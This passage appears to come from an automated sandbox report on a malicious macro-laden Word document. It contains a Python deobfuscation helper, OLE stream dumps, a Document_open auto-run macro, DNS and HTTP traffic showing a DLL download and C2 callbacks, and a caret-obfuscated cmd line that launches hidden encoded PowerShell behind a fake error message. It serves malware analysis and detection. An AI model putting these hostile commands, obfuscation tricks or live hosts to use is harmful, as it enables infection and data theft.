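    expr = re.sub(r"Mid\(Application\.Name,\s*([^,]+),\s*([^)]+)\)", mid_app, expr)
    parts = []
    for term in (t.strip() for t in expr.split("+")):
        if term.startswith('"') and term.endswith('"'):
            parts.append(term[1:-1].replace('""', '"'))  # VBA doubles quotes inside literals
        else:
            parts.append(env.get(term, ""))
    return "".join(parts)


def resolve(vba: str) -> dict:
    """Replay the straight-line string assignments and the Ipls8rqp952u2lk1() decode calls."""
    env = {}
    for line in strip_dead_code(vba).splitlines():
        m = re.fullmatch(r"(\w+)\s*=\s*(.+)", line.strip())
        if not m:
            continue
        name, rhs = m.groups()
        decode = re.fullmatch(r"Ipls8rqp952u2lk1\((\w+)\)", rhs)
        if decode:                                          # Replace(x, JUNK, "")
            env[name] = env.get(decode.group(1), "").replace(JUNK, "")
        elif "(" not in rhs or "Mid(Application.Name" in rhs:
            env[name] = eval_string_expr(rhs, env)
        # anything else (e.g. the StoryRanges() read into dsfe) needs the live document
    return env


def recover_command(body_text: str) -> str:
    """First argument of the Create call: Ipls8rqp952u2lk1(Mid(dsfe, 5, Len(dsfe))),
    i.e. skip the first four characters of the document body, then strip the delimiter."""
    return body_text[4:].replace(JUNK, "")


if __name__ == "__main__":
    env = resolve(MACRO_EXCERPT)
    print(env["Ls12h2gypqhb"])                 # winmgmts:win32_process
    # Constructed stand-in for the document body; the real text is not reproduced on this page.
    print(recover_command("ABCDpw]xm[vowerw]xm[vshell -nop -w hidden -enc <BASE64>"))
```

Resolving the excerpt yields `winmgmts:win32_process`, which is why the sandbox reports process creation via WMI rather than a Shell() call from WINWORD.EXE. The real command line is not recoverable statically from the macro alone: it lives in the document's main text story and has to be read from the WordDocument stream (or taken from the sandbox's process tree) before being fed to recover_command().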
                      VBA File Name: Kyl0l3rqw280c6ssa, Stream Size: 1118
                      General
                      Stream Path:Macros/VBA/Kyl0l3rqw280c6ssa
                      VBA File Name:Kyl0l3rqw280c6ssa
                      Stream Size:1118
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 0c ff 33 b6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Document_open()
                      VB_Creatable
                      False
                      Private
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code
                      Attribute VB_Name = "Kyl0l3rqw280c6ssa"
                      Attribute VB_Base = "1Normal.ThisDocument"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = True
                      Attribute VB_Customizable = True
                      Private Sub Document_open()
                      Bn2p1rxokklh_9o8
                      End Sub
                      VBA File Name: P0_myy5fnenf, Stream Size: 699
                      General
                      Stream Path:Macros/VBA/P0_myy5fnenf
                      VBA File Name:P0_myy5fnenf
                      Stream Size:699
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 0c ff f1 d1 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Attribute
                      VB_Name
                      VBA Code
                      Attribute VB_Name = "P0_myy5fnenf"

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                      General
                      Stream Path:\x1CompObj
                      File Type:data
                      Stream Size:146
                      Entropy:4.00187355764
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      File Type:data
                      Stream Size:4096
                      Entropy:0.280929556603
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . o @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                      General
                      Stream Path:\x5SummaryInformation
                      File Type:data
                      Stream Size:544
                      Entropy:4.17934415163
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                      Stream Path: 1Table, File Type: data, Stream Size: 6424
                      General
                      Stream Path:1Table
                      File Type:data
                      Stream Size:6424
                      Entropy:6.13683822603
                      Base64 Encoded:True
                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                      Stream Path: Data, File Type: data, Stream Size: 99188
                      General
                      Stream Path:Data
                      File Type:data
                      Stream Size:99188
                      Entropy:7.39015578121
                      Base64 Encoded:True
                      Data ASCII:t . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . 7 . . " . . . . . . e i U . . . . . . . . . . . D . . . . . _ . . F . . . . . . . . 7 . . " . . . . . . e i U . . . . . . .
                      Data Raw:74 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 502
                      General
                      Stream Path:Macros/PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:502
                      Entropy:5.4581902648
                      Base64 Encoded:True
                      Data ASCII:I D = " { 7 B C 8 9 A B C - 1 9 3 3 - 4 F 3 3 - A 1 B A - 8 1 7 6 5 C 7 3 8 7 1 6 } " . . D o c u m e n t = K y l 0 l 3 r q w 2 8 0 c 6 s s a / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P 0 _ m y y 5 f n e n f . . M o d u l e = G x 8 f z n t 8 p 0 b . . E x e N a m e 3 2 = " W h k r t 3 k 9 v w q q " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 0 A A 8 0 E A 8 0 E A 8 0 E A 8 0 E " . . D P B = " 3 D 3 F E F 7
                      Data Raw:49 44 3d 22 7b 37 42 43 38 39 41 42 43 2d 31 39 33 33 2d 34 46 33 33 2d 41 31 42 41 2d 38 31 37 36 35 43 37 33 38 37 31 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 30 5f 6d 79 79 35 66 6e 65 6e 66 0d 0a 4d 6f 64 75 6c 65 3d 47 78 38 66 7a 6e 74 38 70 30 62 0d 0a 45 78 65
                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
                      General
                      Stream Path:Macros/PROJECTwm
                      File Type:data
                      Stream Size:131
                      Entropy:3.74080626522
                      Base64 Encoded:False
                      Data ASCII:K y l 0 l 3 r q w 2 8 0 c 6 s s a . K . y . l . 0 . l . 3 . r . q . w . 2 . 8 . 0 . c . 6 . s . s . a . . . P 0 _ m y y 5 f n e n f . P . 0 . _ . m . y . y . 5 . f . n . e . n . f . . . G x 8 f z n t 8 p 0 b . G . x . 8 . f . z . n . t . 8 . p . 0 . b . . . . .
                      Data Raw:4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 00 4b 00 79 00 6c 00 30 00 6c 00 33 00 72 00 71 00 77 00 32 00 38 00 30 00 63 00 36 00 73 00 73 00 61 00 00 00 50 30 5f 6d 79 79 35 66 6e 65 6e 66 00 50 00 30 00 5f 00 6d 00 79 00 79 00 35 00 66 00 6e 00 65 00 6e 00 66 00 00 00 47 78 38 66 7a 6e 74 38 70 30 62 00 47 00 78 00 38 00 66 00 7a 00 6e 00 74 00 38 00 70 00 30 00 62 00 00
                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4495
                      General
                      Stream Path:Macros/VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:4495
                      Entropy:5.32797660773
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 661
                      General
                      Stream Path:Macros/VBA/dir
                      File Type:data
                      Stream Size:661
                      Entropy:6.37896546622
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                      Data Raw:01 91 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 16 c1 ed 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                      Stream Path: WordDocument, File Type: data, Stream Size: 20014
                      General
                      Stream Path:WordDocument
                      File Type:data
                      Stream Size:20014
                      Entropy:4.1368278567
                      Base64 Encoded:False
                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . H . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . b . . . b . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8f 48 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4e 00 00 62 7f 00 00 62 7f 00 00 8f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                      Network Behavior

                      Snort IDS Alerts

                      Timestamp                  Protocol  SID      Message                                                Source Port  Dest Port  Source IP     Dest IP
                      01/12/21-20:31:20.789009   TCP       2404340  ET CNC Feodo Tracker Reported CnC Server TCP group 21  49168        80         192.168.2.22  71.72.196.159

                      Network Port Distribution

                      TCP Packets

                      Jan 12, 2021 20:31:05.588742018 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588763952 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588782072 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588821888 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588856936 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588869095 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588907957 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588942051 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.588947058 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.588985920 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589009047 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589024067 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589063883 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589087009 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589111090 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589154005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589174032 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589193106 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589232922 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589260101 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589271069 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589309931 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589334965 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589349031 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589410067 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589413881 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589472055 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589519024 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589535952 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589562893 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589601040 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589627028 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589638948 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589679956 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589703083 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589715958 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589754105 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589781046 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589792967 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589840889 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589858055 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.589885950 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589912891 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.589951992 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.795813084 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.896431923 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:20.789009094 CET4916880192.168.2.2271.72.196.159
                      Jan 12, 2021 20:31:23.784401894 CET4916880192.168.2.2271.72.196.159
                      Jan 12, 2021 20:31:34.441170931 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:34.825376034 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:34.825609922 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:34.827358961 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:34.827480078 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:35.194834948 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:35.195111990 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:35.552457094 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:35.552515984 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.310410976 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.310657978 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:37.311260939 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.311352968 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:31:37.597510099 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.597558022 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:31:37.597882032 CET4916980192.168.2.2269.49.88.46
                      Jan 12, 2021 20:32:42.344824076 CET804916969.49.88.46192.168.2.22
                      Jan 12, 2021 20:32:42.344913006 CET4916980192.168.2.2269.49.88.46

                      UDP Packets

                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jan 12, 2021 20:31:04.424675941 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                      Jan 12, 2021 20:31:04.484715939 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                      Jan 12, 2021 20:31:05.009018898 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                      Jan 12, 2021 20:31:05.065613985 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22

                      DNS Queries

                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      Jan 12, 2021 20:31:04.424675941 CET | 192.168.2.22 | 8.8.8.8 | 0x71dd | Standard query (0) | remediis.com | A (IP address) | IN (0x0001)
                      Jan 12, 2021 20:31:05.009018898 CET | 192.168.2.22 | 8.8.8.8 | 0x8b68 | Standard query (0) | avadnansahin.com | A (IP address) | IN (0x0001)

                      DNS Answers

                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                      Jan 12, 2021 20:31:04.484715939 CET | 8.8.8.8 | 192.168.2.22 | 0x71dd | No error (0) | remediis.com | - | 5.2.81.171 | A (IP address) | IN (0x0001)
                      Jan 12, 2021 20:31:05.065613985 CET | 8.8.8.8 | 192.168.2.22 | 0x8b68 | No error (0) | avadnansahin.com | - | 109.232.216.177 | A (IP address) | IN (0x0001)

                      HTTP Request Dependency Graph

                      • avadnansahin.com
                      • 69.49.88.46

                      HTTP Packets

                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.22 | 49167 | 109.232.216.177 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Jan 12, 2021 20:31:05.140002012 CET | 3 | OUT | GET /wp-includes/w/ HTTP/1.1
                      Host: avadnansahin.com
                      Connection: Keep-Alive
                      Jan 12, 2021 20:31:05.219491005 CET | 4 | IN | HTTP/1.1 200 OK
                      Connection: Keep-Alive
                      X-Powered-By: PHP/7.0.33
                      Set-Cookie: 5ffdf8f92dc15=1610479865; expires=Tue, 12-Jan-2021 19:32:05 GMT; Max-Age=60; path=/
                      Cache-Control: no-cache, must-revalidate
                      Pragma: no-cache
                      Last-Modified: Tue, 12 Jan 2021 19:31:05 GMT
                      Expires: Tue, 12 Jan 2021 19:31:05 GMT
                      Content-Type: application/octet-stream
                      Content-Disposition: attachment; filename="Rq7pzbnT415DFc.dll"
                      Content-Transfer-Encoding: binary
                      Transfer-Encoding: chunked
                      Date: Tue, 12 Jan 2021 19:31:05 GMT


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.22 | 49169 | 69.49.88.46 | 80 | C:\Windows\SysWOW64\rundll32.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Jan 12, 2021 20:31:34.827358961 CET | 358 | OUT | POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1
                      DNT: 0
                      Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
                      Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 69.49.88.46
                      Content-Length: 5492
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Jan 12, 2021 20:31:37.310410976 CET | 365 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 12 Jan 2021 19:31:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Vary: Accept-Encoding


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Memory Usage

                      High Level Behavior Distribution

                      Behavior

                      System Behavior

                      General

                      Start time: 20:30:34
                      Start date: 12/01/2021
                      Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit): false
                      Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase: 0x13f120000
                      File size: 1424032 bytes
                      MD5 hash: 95C38D04597050285A18F66039EDB456
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high

                      General

                      Start time: 20:30:35
                      Start date: 12/01/2021
                      Path: C:\Windows\System32\cmd.exe
                      Wow64 process (32bit): false
                      Commandline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Imagebase: 0x4a3f0000
                      File size: 345088 bytes
                      MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 20:30:36
                      Start date: 12/01/2021
                      Path: C:\Windows\System32\msg.exe
                      Wow64 process (32bit): false
                      Commandline: msg user /v Word experienced an error trying to open the file.
                      Imagebase: 0xff0f0000
                      File size: 26112 bytes
                      MD5 hash: 2214979661E779C3E3C33D4F14E6F3AC
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      General

                      Start time: 20:30:36
